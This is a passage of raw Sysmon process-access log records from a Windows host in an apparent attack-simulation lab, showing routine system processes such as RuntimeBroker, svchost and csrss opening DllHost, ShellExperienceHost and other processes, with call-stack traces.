df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.685{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.669{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.669{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-800E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.669{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.669{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.669{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-810E-00000000BB01}6304C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.654{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-800E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.654{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-800E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.654{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.654{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.654{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.638{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.638{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.638{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7F0E-00000000BB01}888C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.622{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000080266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 